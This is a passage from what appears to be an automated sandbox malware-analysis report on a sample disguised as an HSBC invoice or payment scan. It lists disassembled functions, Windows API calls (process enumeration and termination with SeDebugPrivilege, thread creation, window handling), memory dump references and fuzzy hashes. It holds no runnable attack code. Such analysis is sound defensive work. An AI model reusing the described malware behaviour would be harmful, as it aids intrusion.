                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: 6787b6874abca86461c07841da32e8ae0dbe339a5e81d6956d047d2621079a13
                    • Instruction ID: 13dee2f42e0769e3e259bbb5068b3fcb2a9259feb29fd3b4d304b41e6f50ab47
                    • Opcode Fuzzy Hash: 6787b6874abca86461c07841da32e8ae0dbe339a5e81d6956d047d2621079a13
                    • Instruction Fuzzy Hash: 865176B21087899BC724EB60C8819DFB3DCAF85344F10592EF289E7191EF74E588C766
                    Function 00F088B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F0896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 4c1af0de1e838034b5b2311191a6802fcd9bd7e5d1fcc4084a1f73a1b03d24f8
                    • Instruction ID: f8e39bd9db083cd8f2d03b73e4e05505a11673125ca9f5757fe6ae628859adce
                    • Opcode Fuzzy Hash: 4c1af0de1e838034b5b2311191a6802fcd9bd7e5d1fcc4084a1f73a1b03d24f8
                    • Instruction Fuzzy Hash: 3251D630A00308BFDF309F28CC85BA97BA4BB157A0F504116F995E65E1DF75A986BB41
                    Function 00E82B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EBC547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EBC569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EBC581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EBC59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EBC5C0
                    • DestroyCursor.USER32(00000000), ref: 00EBC5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EBC5EC
                    • DestroyCursor.USER32(?), ref: 00EBC5FB
                      • Part of subcall function 00F0A71E: DeleteObject.GDI32(00000000), ref: 00F0A757
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2975913752-0
                    • Opcode ID: f8f8dd18289de30ec3e06fd72bc1c89c41aa6c19fe51ffe3fc9af6ac72f91764
                    • Instruction ID: 870ac3065db62c1536582af22642886a4ffbbf92c980eaf6177aeb8aed46ada8
                    • Opcode Fuzzy Hash: f8f8dd18289de30ec3e06fd72bc1c89c41aa6c19fe51ffe3fc9af6ac72f91764
                    • Instruction Fuzzy Hash: CB515974601209AFDB20EF24CC45FAA77E5FB59714F205528FA0AE76A0DB70ED90EB50
                    Function 00ED8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E0C
                    • RtlAllocateHeap.NTDLL(00000000,?,00ED8A84), ref: 00ED8E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00ED8A84,00000B00,?,?), ref: 00ED8E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E30
                    • DuplicateHandle.KERNEL32(00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00ED8A84,00000B00,?,?), ref: 00ED8E43
                    • GetCurrentProcess.KERNEL32(00ED8A84,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E4B
                    • DuplicateHandle.KERNEL32(00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E4E
                    • CreateThread.KERNEL32(00000000,00000000,00ED8E74,00000000,00000000,00000000), ref: 00ED8E68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                    • String ID:
                    • API String ID: 1422014791-0
                    • Opcode ID: 5f8751f5abf6ca0cdd07dae7ede4894ed197da01f0900537d109e060d47de526
                    • Instruction ID: 4f24d50568265250e11f1c831c70a44361a57097509d268a5f0854322ed8e765
                    • Opcode Fuzzy Hash: 5f8751f5abf6ca0cdd07dae7ede4894ed197da01f0900537d109e060d47de526
                    • Instruction Fuzzy Hash: 6201A4B5240308FFE620ABA5DC49F6B3BACFB89711F004421FA05DB6A1CA7098049A20
                    Function 00EF9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-625585964
                    • Opcode ID: e95484bdc0ab172880ab38f4c03bd2801a70a62d265a98e875d749571fdf7792
                    • Instruction ID: f2e949e68bace125e4eb3edeb9858172a41295ede709dfc1a0a9f23206e3093f
                    • Opcode Fuzzy Hash: e95484bdc0ab172880ab38f4c03bd2801a70a62d265a98e875d749571fdf7792
                    • Instruction Fuzzy Hash: C791DE70A00219ABDF24DFA5C884FAEB7B8EF85314F109059F655FB282D7709905CFA0
                    Function 00F06FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F07093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F070A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F070C1
                    • _wcscat.LIBCMT ref: 00F0711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F07133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F07161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: e13c337afa03cf3b8c74932264f0acb85ffcd8f11a37628fc18a1e628bbeb600
                    • Instruction ID: c467b74d2ebf6b4db158310c3378800048563b7f67c9602b5b669668110ff6a1
                    • Opcode Fuzzy Hash: e13c337afa03cf3b8c74932264f0acb85ffcd8f11a37628fc18a1e628bbeb600
                    • Instruction Fuzzy Hash: F6417271D04308ABDB219F64CC85BEA77E8EF08360F10456AF944E71D1D772AD85AB50
                    Function 00EFEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EE3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00EE3EB6
                      • Part of subcall function 00EE3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00EE3EC4
                      • Part of subcall function 00EE3E91: CloseHandle.KERNEL32(00000000), ref: 00EE3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EFECB8
                    • GetLastError.KERNEL32 ref: 00EFECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EFECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EFED77
                    • GetLastError.KERNEL32(00000000), ref: 00EFED82
                    • CloseHandle.KERNEL32(00000000), ref: 00EFEDB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: 7aa78aab5e240e71f83c4269571631aa4fcd5f5ee8c0f7a521aa9b5ecaa88754
                    • Instruction ID: df4deeed874a65b5c4c5d29a094734289ec4756dfe1e9b5b3a0265da059581f4
                    • Opcode Fuzzy Hash: 7aa78aab5e240e71f83c4269571631aa4fcd5f5ee8c0f7a521aa9b5ecaa88754
                    • Instruction Fuzzy Hash: DF41BD712002049FDB24EF24CC95F7EB7E1AF80714F189459FA46AB3D2DB75A805CB92
                    Function 00EE3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 00EE32C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: 4b5d67796ac8dffed2866b531ded0c1b5b64f4496b00878360f770a1e8b1d85e
                    • Instruction ID: e9c40a3c2435b96a2a9c19717544262a1bd4cc96831520e89aff55018be3a03e
                    • Opcode Fuzzy Hash: 4b5d67796ac8dffed2866b531ded0c1b5b64f4496b00878360f770a1e8b1d85e
                    • Instruction Fuzzy Hash: DB112B316093CEBAD7015A77DC46CABB3DCDF1D374F20102AFA40B7191D665EB4055A6
                    Function 00EF8BC0 Relevance: 12.3, APIs: 8, Instructions: 324COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00EF8BEC
                    • CoInitialize.OLE32(00000000), ref: 00EF8C19
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00EF8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EF8E50
                    • CoGetObject.OLE32(?,00000000,00F12C0C,?), ref: 00EF8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 00EF8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EF8F3A
                    • VariantClear.OLEAUT32(?), ref: 00EF8F4A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
                    • String ID:
                    • API String ID: 2437601815-0
                    • Opcode ID: 5ef7931747b9911e79d6aadfc9f4caad8c99011e6fb3f3b1bcfcd66075972180
                    • Instruction ID: a1f32b113c3015fc1cc2dbfa51d8efdf878eb66317f0e5a565e5073ecdad4fec
                    • Opcode Fuzzy Hash: 5ef7931747b9911e79d6aadfc9f4caad8c99011e6fb3f3b1bcfcd66075972180
                    • Instruction Fuzzy Hash: 46C13471608309AFD700EF64C98496BB7E9FF88348F00596DF689AB251DB31ED05CB52
                    Function 00EE4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EE454E
                    • LoadStringW.USER32(00000000), ref: 00EE4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EE456B
                    • LoadStringW.USER32(00000000), ref: 00EE4572
                    • _wprintf.LIBCMT ref: 00EE4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EE45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 00EE4593
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: 6aa036a2f97a98e01e08f383e9b3eeb94e75e1d2523cf1847d57fefc6d027a10
                    • Instruction ID: 3817c887d65899398ca6ceabd1fbd5e33c3f380249710500d72d49bbd2fd6f21
                    • Opcode Fuzzy Hash: 6aa036a2f97a98e01e08f383e9b3eeb94e75e1d2523cf1847d57fefc6d027a10
                    • Instruction Fuzzy Hash: A70162F290020CBFE720E7A0DD89EE7776CE708301F4005A5BB45E2051EA759E899B71
                    Function 00E82A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00E82ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000,000000FF), ref: 00E82B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00EBC46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00EBC4D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: 12428009f0147b89f7847d5eb87fcbec29bf612e3e595e579b0ccb3beddff3f7
                    • Instruction ID: f99618c648183ee913494fd7f6ab0db29e1d3ea2db9ac1d29c76f09bd6992b5b
                    • Opcode Fuzzy Hash: 12428009f0147b89f7847d5eb87fcbec29bf612e3e595e579b0ccb3beddff3f7
                    • Instruction Fuzzy Hash: F4416E34208680AEC73DAB28CC9C7FB7B92FF46308F24A45DE25FB6560C6359845E711
                    Function 00EE7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EE737F
                      • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                      • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EE73B6
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00EE73D2
                    • _memmove.LIBCMT ref: 00EE7420
                    • _memmove.LIBCMT ref: 00EE743D
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EE7461
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EE7480
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: 8f72cabd9d15e6a9d763a27230805fd8a75ca9417c872a2cab32cc1c9e55b123
                    • Instruction ID: 94f9bf6507f94a94ecfe879b00c76af07791c876b2f8915a9ee8a113e6cdd320
                    • Opcode Fuzzy Hash: 8f72cabd9d15e6a9d763a27230805fd8a75ca9417c872a2cab32cc1c9e55b123
                    • Instruction Fuzzy Hash: 7B316F35A04209EBCF10EF65DC85AAF7BB8FF49710F1441B5F904AB246DB70AA14DBA0
                    Function 00F06442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 00F0645A
                    • GetDC.USER32(00000000), ref: 00F06462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F0646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 00F06479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F064B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F064C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F09299,?,?,000000FF,00000000,?,000000FF,?), ref: 00F06500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F06520
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 69a684c0df1fffd839283876f3debb63bcec771fbdd10ce0570317f153f7fedd
                    • Instruction ID: 97694251d8803bed6d64d40b41fc87b6eaa340661c1e85cf2480904e6ec8f006
                    • Opcode Fuzzy Hash: 69a684c0df1fffd839283876f3debb63bcec771fbdd10ce0570317f153f7fedd
                    • Instruction Fuzzy Hash: 3B318D72200214BFEB208F10CC4AFEA3FA9FF09765F044065FE08DA191C6759851EB60
                    Function 00EDC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
